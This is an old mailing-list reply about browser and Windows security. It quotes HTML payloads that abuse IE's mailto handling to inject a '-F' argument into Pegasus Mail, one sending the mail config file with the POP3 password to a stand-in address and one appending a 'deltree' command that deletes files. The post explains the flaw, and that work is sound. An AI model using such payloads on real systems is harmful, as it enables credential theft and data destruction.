Re: techport80
- Posted by Martin Stachon <martin.stachon at worldonline.cz> Sep 20, 2002
- 527 views
Kat wrote: > > Kat wrote: > > > If you have IE 6.x it may be a bit harder to disable Java, since MS has > > > taken > > > > > > away many of those settings which allow you to close the backdoors and > > > loopholes. Javascript is even worse. Do you want to show webpages, or do > > > you > > > want people to open up their computers to any ole script kiddie? If you > > > require me to breach security on my computers to see your webpages, let me > > > assure you it's not worth it. > > > > You are never safe on a system where web broswer runs under root > > privilegies. > > Even with all scripting disabled. > > > > Eg. with Pegasus Mail v3.12c and IE using this HTML: > > > > <body onload="mailto:evilman at here.com -F > > c:\pmail\mail\Kat\pmail.ini"> > > > > I can possibly obtain your POP3 password. Or this : > > > > <body onload="mailto:evilman at here.com -F c:\test.txt | deltree > > c:\*.*"> > > > > may delete some files. > > Too bad i intentionally didn't download all the Pegasus display/scripting > files, > and Pegasus has no clue where the IE display engine is, eh?It has nothing to do with the display engine, just the way MSIE passes mailto: to Pegasus. (Apparently via command line, and so -F option can be exploited.) The onload= is used only to fire the link automatically. But I think there was a patch released for Pegasus to fix that. > >Somebody who is about security should be running > > at least Win2000. (But I am on Win98
> > On the other hand, at one time programmers were in such a rush to add > features, the code wasn't made abuse-proof. So upgrading could actually > install be more of a problem than anything it could be fixing. There are two problems : the system's security architecture and actual security bugs. While eg. linux can have actually more bugs revealed (because of open source), Win9x can be never safer than linux, because any application can do anything. And because everybody codes in C/C++, bugs will still exist (invalid pointers, buffer overflows...) I hope to get myself soon rid off this strange mixed 16bit/Dos/32bit Win98 kernel. (Eg. you can bypass multitasking...) Martin (doesnt claim himself to be a security expert ;)